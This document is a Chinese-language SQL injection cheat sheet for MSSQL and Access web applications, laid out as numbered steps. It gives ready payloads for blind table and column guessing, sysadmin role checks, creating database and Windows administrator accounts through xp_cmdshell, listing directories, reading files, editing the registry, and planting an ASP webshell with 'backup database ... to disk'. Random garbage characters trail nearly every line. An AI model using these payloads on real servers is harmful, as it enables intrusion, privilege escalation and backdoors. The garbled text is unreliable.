1.判断是否有注入;and 1=1 ;and 1=2 KD�l_?9E5�
2.初步判断是否是mssql ;and user>0 Vh�j�M�>(�
7�QK��r�_�
3.注入参数是字符'and [查询条件] and ''=' ~8"8w(CG*I
8t�@p�@Td|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' R�8rfM?"�W
y2]��-&�]&
5.判断数据库系统 mW��R4�|1(
bY}eUL2i4
;and (select count(*) from sysobjects)>0 mssql Le�<w�R��
|#1�(�Z-�}
;and (select count(*) from msysobjects)>0 access .�q&'&~!�_
?b�M�_q_5�
"�&+"�@�<�
9�j� W���2
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `n�$5�+�a+
J!'@��B�d
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 b'6-�dU%��
�5��4
>��-
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Og=*R��6�i
+f*O�li�MD
9.(1)猜字段的ascii值(access) '*�\|;�l#1
�"���D�?z�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 r�x�(�2�yf
G8Nt
8��U~
(2)猜字段的ascii值(mssql) 6JKqn~0K�k
~"UV]Udn�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �}�%Bl>M��
Or
!+�._3i
10.测试权限结构(mssql) �U��s+pc^A
u%�~igt@x�
LM&y@"wf�m
�@+�a�tBmt
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- _`64gS}�^�
s�K��lDu�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ^�"J8r W6[
�-V��:�"�l
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ;FZ@:%qDm�
t���|~YEQ�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- $�.9{if#o&
�[HCAm�n�b
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- [o�F|s-"9!
�B<����C*
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &Z��L�3{�M
4lBU#V��7�
;and 1=(select IS_MEMBER('db_owner'));-- /z� BxJ�T0
l� x,"EOP�
76�5�p/**�
Zh��_|m#)
11.添加mssql和系统的帐户 )T�k1 QH�U
x' .:�&z��
;exec master.dbo.sp_addlogin username;-- I4&::�y^�C
;exec master.dbo.sp_password null,username,password;-- %;.�;>�Y(-
!qX_I db\�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��,_"AT!�r
?�.�D3�'qv
;exec master.dbo.xp_cmdshell 'net user username password Ot]Ru,y->+
n> ^�[T[.S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- lkBd�l#]9�
�{'U�
Rz[g
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �}g�4 M2|�
��H"q�OSf{
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- =�2@��B&��
��8=]Tr3 �
�B, 9w���0
=C~/7N,lW]
12.(1)遍历目录 jAud {m*�T
9'r�:��~�O
;create table dirs(paths varchar(100), id int) c��q$���i�
rD����*sl}
;insert dirs exec master.dbo.xp_dirtree 'c:\' �?�:w1�je7
�8stw�g'
;and (select top 1 paths from dirs)>0 .jj$�Kh q]
s>�^dxF�!+
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
6H�'�HxB4
48Mp��f=f`
h(�5P(`��M
w+�N> h;�j
(2)遍历目录 hX�A6D) ��
&�B�|D;|7H
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Ps� 8��%J;
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $jg�*pm�R-
kc�Q'$<Mz<
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 aJcf`�<p��
hiUD]5K��p
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Z.��M�,�NR
s�q;�s�]@~
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �/IsS;0K%L
/RMPS.
d
{
?]x�|�Zy�
FHC��\?Cg�
13.mssql中的存储过程 P�TEHP����
kS!v�iJwtT
xp_regenumvalues 注册表根键, 子键 L@gWzC~?Q
Ov�j^IjG-`
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��ndeebXw*
*guoWPA|Ij
xp_regread 根键,子键,键值名 :duo#w"K��
YJo���["Q�
;exec xp_regread kS�DZZ�x�
!U5Wr+8��3
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �q#�8���[�
0D&t!$Ib�f
xp_regwrite 根键,子键, 值名, 值类型, 值 o";Z$tAJkC
�Vh��Nz8�)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 %%4t�~XC#�
�d�,=r�9�.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 z�-�b*D}�&
nG��;8:f�`
xp_regdeletevalue 根键,子键,值名 -*�X�CxU'�
Cm\6��tD��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 -�k"^�o!p
V,�G|��k!!
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 +9")�K�QT�
r3\cp0P;�s
^Y
�iJV�7�
�!Uq^�7�Mw
14.mssql的backup创建webshell ��z5r���$M
$�t6e2=7
use model iyS��RY�^�
?G�-e](]^<
create table cmd(str image); U�NkC��L4N
Bn(W"��=1
insert into cmd(str) values (''); z
d-T�v`L#
u�6bXv���(
backup database model to disk='c:\l.asp'; -
h�9?1vc7
n2f�bp\�I�
J;�f!!<l�\
|�lk�N��i
15.mssql内置函数 r9ww.PpNk#
0JJ��S2oY/
;and (select @@version)>0 获得Windows的版本号 ��$�O �dCL
�`IY�/9'vT
;and user_name()='dbo' 判断当前系统的连接用户是不是sa l!g]a�2�x*
~R�@Nd~�L�
;and (select user_name())>0 爆当前系统的连接用户 [NTtz
<i@
g=$�1cC+�(
;and (select db_name())>0 得到当前连接的数据库 p��f_mf�.
�14"J d\M8
��?|ZTaX6A
�#Z<�a��
16.简洁的webshell MC��{
�2�X
&�JtV�'@>v
use model jWY�V#ifs2
P'O#I}Dmw<
create table cmd(str image); = hN
!;7�G
-G�|�G�_$9
insert into cmd(str) values (''); ~fo6*g�:f1
3�7RLE1Yf
backup database model to disk='g:\wwwtest\l.asp';
